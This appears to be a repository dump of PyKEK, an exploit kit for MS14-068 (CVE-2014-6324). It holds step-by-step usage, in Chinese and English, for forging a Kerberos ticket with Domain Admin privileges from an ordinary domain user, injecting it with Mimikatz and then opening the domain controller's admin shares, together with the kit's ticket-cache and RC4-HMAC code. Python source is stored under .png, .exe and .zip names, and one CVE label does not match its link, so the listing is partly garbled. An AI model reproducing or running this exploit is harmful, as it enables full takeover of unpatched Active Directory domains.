MS14-068

Author: Gitmaninc

MS14-068/MS14-068.exe

@@ -0,0 +1,42 @@
+# MS14-068
+
+```
+将普通域用户权限提升为域控权限  
+（漏洞利用后，netuse \\swg.server.com\c$可以直接访问域控的网络资源
+```
+
+Vulnerability reference:
+ * [MS14-068](https://technet.microsoft.com/library/security/ms14-068)
+ * [CVE-2008-4037](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6324)
+ 
+## Usage
+```
+域管理员:DCwin03  域名:demo.com  普通域用户:hx
+
+登录普通域用户hx，cmd中输入"whoami/user"获取sid  
+demo/hx   S-1-5-21-3813283032-1038476579-1047458262-1110
+  
+![x1](img/x1.png)  
+![x2](img/x2.png)
+退出域用户hx，登录本地用户123  
+
+python ms14-068.py -u [email protected] -p pwd_of_test -s S-1-5-21-3813283032-1038476579-1047458262-1110 -d DCwin03.demo.com  
+![x3](img/x4.png)
+![x4](img/x4.png)  
+c:\User\123>Mimikatz.exe "kerberos:ptc [email protected]" exit  
+  
+net use \\DCwin03\admin$  
+
+dir \\DCwin03\c$
+```
+
+
+## References
+* [Additional information about CVE-2014-6324](http://blogs.technet.com/b/srd/archive/2014/11/18/additional-information-about-cve-2014-6324.aspx)
+* [深入解读MS14-068漏洞](http://www.freebuf.com/vuls/56081.html)
+* [Attack Methods for Gaining Domain Admin Rights in Active Directory](https://adsecurity.org/?p=2362)
+* [MS14068域控提权漏洞及其防护](http://www.php230.com/weixin1418640395.html)
+* [MS14-068 privilege escalation PoC](http://www.secpulse.com/archives/2874.html)
+
+
+

MS14-068/README.md

@@ -0,0 +1,64 @@
+Python Kerberos Exploitation Kit
+===
+
+PyKEK (Python Kerberos Exploitation Kit), a python library to manipulate KRB5-related data. (Still in development)
+
+For now, only a few functionalities have been implemented (in a quite Quick'n'Dirty way) to exploit  MS14-068 (CVE-2014-6324) .
+
+More is coming...
+
+# Author
+Sylvain Monné
+
+Contact : sylvain dot monne at solucom dot fr
+
+http://twitter.com/bidord
+
+Special thanks to: Benjamin DELPY `gentilkiwi`
+
+# Library content
+* kek.krb5: Kerberos V5 ([RFC 4120](https://tools.ietf.org/html/rfc4120)) ASN.1 structures and basic protocol functions
+* kek.ccache: Credential Cache Binary Format ([cchache](http://www.gnu.org/software/shishi/manual/html_node/The-Credential-Cache-Binary-File-Format.html))
+* kek.pac: Microsoft Privilege Attribute Certificate Data Structure ([MS-PAC](http://msdn.microsoft.com/en-us/library/cc237917.aspx))
+* kek.crypto: Kerberos and MS specific cryptographic functions
+
+# Exploits
+## ms14-068.py
+Exploits [MS14-680](https://technet.microsoft.com/en-us/library/security/ms14-068.aspx) vulnerability on an un-patched domain controler of an Active Directory domain to get a Kerberos ticket for an existing domain user account with the privileges of the following domain groups :
+- Domain Users (513)
+- Domain Admins (512)
+- Schema Admins (518)
+- Enterprise Admins (519)
+- Group Policy Creator Owners (520)
+
+### Usage :
+```
+USAGE:
+ms14-068.py -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr>
+
+OPTIONS:
+    -p <clearPassword>
+ --rc4 <ntlmHash>
+```
+### Example usage :
+#### Linux (tested with samba and MIT Kerberos)
+```
+root@kali:~/sploit/pykek# python ms14-068.py -u [email protected] -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc
+Password: 
+  [+] Building AS-REQ for dc-a-2003.dom-a.loc... Done!
+  [+] Sending AS-REQ to dc-a-2003.dom-a.loc... Done!
+  [+] Receiving AS-REP from dc-a-2003.dom-a.loc... Done!
+  [+] Parsing AS-REP from dc-a-2003.dom-a.loc... Done!
+  [+] Building TGS-REQ for dc-a-2003.dom-a.loc... Done!
+  [+] Sending TGS-REQ to dc-a-2003.dom-a.loc... Done!
+  [+] Receiving TGS-REP from dc-a-2003.dom-a.loc... Done!
+  [+] Parsing TGS-REP from dc-a-2003.dom-a.loc... Done!
+  [+] Creating ccache file '[email protected]'... Done!
+root@kali:~/sploit/pykek# mv [email protected] /tmp/krb5cc_0 
+```
+#### On Windows
+
+```
+python.exe ms14-068.py -u [email protected] -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc
+mimikatz.exe "kerberos::ptc [email protected]" exit`
+```

MS14-068/img/x1.png

@@ -0,0 +1,24 @@
+class ARC4Cipher(object):
+     def __init__(self, key):
+         self.key = key
+         
+     def encrypt(self, data):
+         S = range(256)
+         j = 0
+         out = []
+         for i in range(256):
+             j = (j + S[i] + ord( self.key[i % len(self.key)] )) % 256
+             S[i] , S[j] = S[j] , S[i]
+         i = j = 0
+         for char in data:
+             i = ( i + 1 ) % 256
+             j = ( j + S[i] ) % 256
+             S[i] , S[j] = S[j] , S[i]
+             out.append(chr(ord(char) ^ S[(S[i] + S[j]) % 256]))
+         return ''.join(out)
+
+     def decrypt(self, data):
+         return self.encrypt(data)
+
+def new(key):
+    return ARC4Cipher(key)

MS14-068/img/x2.png

@@ -0,0 +1,4 @@
+import hashlib
+
+def new(*args):
+    return hashlib.new('md4', *args)

MS14-068/img/x3.png

@@ -0,0 +1,4 @@
+import hashlib
+
+def new(*args):
+    return hashlib.md5(*args)

MS14-068/img/x4.png

@@ -0,0 +1,190 @@
+#!/usr/bin/python
+
+# Author
+# ------
+# Sylvain Monne
+# Contact : sylvain dot monne at solucom dot fr
+# http://twitter.com/bidord
+
+from collections import namedtuple
+import struct
+from struct import pack, unpack
+
+from util import gt2epoch, bitstring2int
+from krb5 import encode, Ticket, NT_PRINCIPAL
+
+CCacheCredential = namedtuple('CCacheCredential', 'client server key time is_skey tktflags addrs authdata ticket second_ticket')
+CCacheKeyblock = namedtuple('CCacheKeyblock', 'keytype etype keyvalue')
+CCacheTimes = namedtuple('CCacheTimes', 'authtime starttime endtime renew_till')
+CCacheAddress = namedtuple('CCacheAddress', 'addrtype addrdata')
+CCacheAuthdata = namedtuple('CCacheAuthdata', 'authtype authdata')
+CCachePrincipal = namedtuple('CCachePrincipal', 'name_type realm components')
+
+VERSION = 0x0504
+DEFAULT_HEADER = '00010008ffffffff00000000'.decode('hex')
+
+class CCache(object):
+    def __init__(self, primary_principal, credentials=[], header=DEFAULT_HEADER):
+        if not isinstance(primary_principal, CCachePrincipal):
+            if isinstance(primary_principal, basestring) and '@' in primary_principal:
+                realm, user_name = primary_principal.split('@', 1)
+            elif isinstance(primary_principal, tuple) and len(primary_principal) == 2:
+                realm, user_name = primary_principal
+            else:
+                raise ValueError('Bad primary principal format: %r' % primary_principal)
+            primary_principal = CCachePrincipal(NT_PRINCIPAL, realm, [user_name])
+
+        self.primary_principal = primary_principal
+        self.credentials = credentials
+        self.header = header
+
+    @classmethod
+    def load(cls, filename):
+        fp = open(filename, 'rb')
+        version, headerlen = unpack('>HH', fp.read(4))
+        if version != VERSION:
+            raise ValueError('Unsupported version: 0x%04x' % version)
+        header = fp.read(headerlen)
+        primary_principal = cls.read_principal(fp)
+        credentials = []
+        while True:
+            try:
+                credentials.append(cls.read_credential(fp))
+            except struct.error:
+                break
+        fp.close()
+        return cls(primary_principal, credentials, header)
+
+    def save(self, filename):
+        fp = open(filename, 'wb')
+        fp.write(pack('>HH', VERSION, len(self.header)))
+        fp.write(self.header)
+        self.write_principal(fp, self.primary_principal)
+        for cred in self.credentials:
+            self.write_credential(fp, cred)
+        fp.close()
+
+    def add_credential(self, newcred):
+        for i in range(len(self.credentials)):
+            if self.credentials[i].client == newcred.client and \
+                    self.credentials[i].server == newcred.server:
+                self.credentials[i] = newcred
+                return
+        self.credentials.append(newcred)
+
+    @classmethod
+    def read_string(cls, fp):
+        length = unpack('>I', fp.read(4))[0]
+        return fp.read(length)
+
+    @classmethod
+    def write_string(cls, fp, s):
+        fp.write(pack('>I', len(s)))
+        fp.write(s)
+
+    @classmethod
+    def read_principal(cls, fp):
+        name_type, num_components = unpack('>II', fp.read(8))
+        realm = cls.read_string(fp)
+        components = [cls.read_string(fp) for i in range(num_components)]
+        return CCachePrincipal(name_type, realm, components)
+    
+    @classmethod
+    def write_principal(cls, fp, p):
+        fp.write(pack('>II', p.name_type, len(p.components)))
+        cls.write_string(fp, p.realm)
+        for comp in p.components:
+            cls.write_string(fp, comp)
+
+    @classmethod
+    def read_keyblock(cls, fp):
+        keytype, etype, keylen = unpack('>HHH', fp.read(6))
+        keyvalue = fp.read(keylen)
+        return CCacheKeyblock(keytype, etype, keyvalue)
+
+    @classmethod
+    def write_keyblock(cls, fp, k):
+        fp.write(pack('>HHH', k.keytype, k.etype, len(k.keyvalue)))
+        fp.write(k.keyvalue)
+
+    @classmethod
+    def read_times(cls, fp):
+        authtime, starttime, endtime, renew_till = unpack('>IIII', fp.read(16))
+        return CCacheTimes(authtime, starttime, endtime, renew_till)
+
+    @classmethod
+    def write_times(cls, fp, t):
+        fp.write(pack('>IIII', t.authtime, t.starttime, t.endtime, t.renew_till))
+
+    @classmethod
+    def read_address(cls, fp):
+        addrtype = unpack('>H', fp.read(2))[0]
+        addrdata = cls.read_string(fp)
+        return CCacheAddress(addrtype, addrdata)
+
+    @classmethod
+    def write_address(cls, fp, a):
+        fp.write(pack('>H', a.addrtype))
+        cls.write_string(fp, a.addrdata)
+
+    @classmethod
+    def read_credential(cls, fp):
+        client = cls.read_principal(fp)
+        server = cls.read_principal(fp)
+        key = cls.read_keyblock(fp)
+        time = cls.read_times(fp)
+        is_skey, tktflags, num_address = unpack('>BII', fp.read(9))
+        addrs = [cls.read_address(fp) for i in range(num_address)]
+        num_authdata = unpack('>I', fp.read(4))[0]
+        authdata = [cls.read_authdata(fp) for i in range(num_authdata)]
+        ticket = cls.read_string(fp)
+        second_ticket = cls.read_string(fp)
+        return CCacheCredential(client, server, key, time, is_skey, tktflags,
+                                addrs, authdata, ticket, second_ticket)
+
+    @classmethod
+    def write_credential(cls, fp, c):
+        cls.write_principal(fp, c.client)
+        cls.write_principal(fp, c.server)
+        cls.write_keyblock(fp, c.key)
+        cls.write_times(fp, c.time)
+        fp.write(pack('>BII', c.is_skey, c.tktflags, len(c.addrs)))
+        for addr in c.addrs:
+            cls.write_address(fp, addr)
+        fp.write(pack('>I', len(c.authdata)))
+        for authdata in c.authdata:
+            cls.write_authdata(fp, authdata)
+        cls.write_string(fp, c.ticket)
+        cls.write_string(fp, c.second_ticket)
+
+def get_tgt_cred(ccache):
+    for credential in ccache.credentials:
+        if credential.server.components[0] == 'krbtgt':
+            return credential
+    raise ValueError('No TGT in CCache!')
+
+def kdc_rep2ccache(kdc_rep, kdc_rep_enc):
+    return CCacheCredential(
+        client=CCachePrincipal(
+            name_type=int(kdc_rep['cname']['name-type']),
+            realm=str(kdc_rep['crealm']),
+            components=[str(c) for c in kdc_rep['cname']['name-string']]),
+        server=CCachePrincipal(
+            name_type=int(kdc_rep_enc['sname']['name-type']),
+            realm=str(kdc_rep_enc['srealm']),
+            components=[str(c) for c in kdc_rep_enc['sname']['name-string']]),
+        key=CCacheKeyblock(
+            keytype=int(kdc_rep_enc['key']['keytype']),
+            etype=0,
+            keyvalue=str(kdc_rep_enc['key']['keyvalue'])),
+        time=CCacheTimes(
+            authtime=gt2epoch(str(kdc_rep_enc['authtime'])),
+            starttime=gt2epoch(str(kdc_rep_enc['starttime'])),
+            endtime=gt2epoch(str(kdc_rep_enc['endtime'])),
+            renew_till=gt2epoch(str(kdc_rep_enc['renew-till']))),
+        is_skey=0,
+        tktflags=bitstring2int(kdc_rep_enc['flags']),
+        addrs=[],
+        authdata=[],
+        ticket=encode(kdc_rep['ticket'].clone(tagSet=Ticket.tagSet, cloneValueFlag=True)),
+        second_ticket='')

MS14-068/mimikatz_trunk.zip

@@ -0,0 +1,65 @@
+#!/usr/bin/python
+
+# Author
+# ------
+# Sylvain Monne
+# Contact : sylvain dot monne at solucom dot fr
+# http://twitter.com/bidord
+
+from random import getrandbits, sample
+from struct import pack
+
+try:
+    from Crypto.Cipher import ARC4
+    from Crypto.Hash import HMAC, MD5, MD4
+except ImportError:
+    from _crypto import ARC4, MD5, MD4
+    import hmac as HMAC
+
+# supported encryptions
+RC4_HMAC = 23
+
+# suported checksum
+RSA_MD5 = 7
+HMAC_MD5 = 0xFFFFFF76
+
+def random_bytes(n):
+    return ''.join(chr(c) for c in sample(xrange(256), n))
+
+def decrypt(etype, key, msg_type, encrypted):
+    if etype != RC4_HMAC:
+        raise NotImplementedError('Only RC4-HMAC supported!')
+    chksum = encrypted[:16]
+    data = encrypted[16:]
+    k1 = HMAC.new(key, pack('<I', msg_type)).digest()
+    k3 = HMAC.new(k1, chksum).digest()
+    data = ARC4.new(k3).decrypt(data)
+    if HMAC.new(k1, data).digest() != chksum:
+        raise ValueError('Decryption failed! (checksum error)')
+    return data[8:]
+
+def encrypt(etype, key, msg_type, data):
+    if etype != RC4_HMAC:
+        raise NotImplementedError('Only RC4-HMAC supported!')
+    k1 = HMAC.new(key, pack('<I', msg_type)).digest()
+    data = random_bytes(8) + data
+    chksum = HMAC.new(k1, data).digest()
+    k3 = HMAC.new(k1, chksum).digest()
+    return chksum + ARC4.new(k3).encrypt(data)
+
+def checksum(cksumtype, data, key=None):
+    if cksumtype == RSA_MD5:
+        return MD5.new(data).digest()
+    elif cksumtype == HMAC_MD5:
+        return HMAC.new(key, data).digest()
+    else:
+        raise NotImplementedError('Only MD5 supported!')
+
+def generate_subkey(etype=RC4_HMAC):
+    if etype != RC4_HMAC:
+        raise NotImplementedError('Only RC4-HMAC supported!')
+    key = random_bytes(16)
+    return (etype, key)
+
+def ntlm_hash(pwd):
+    return MD4.new(pwd.encode('utf-16le'))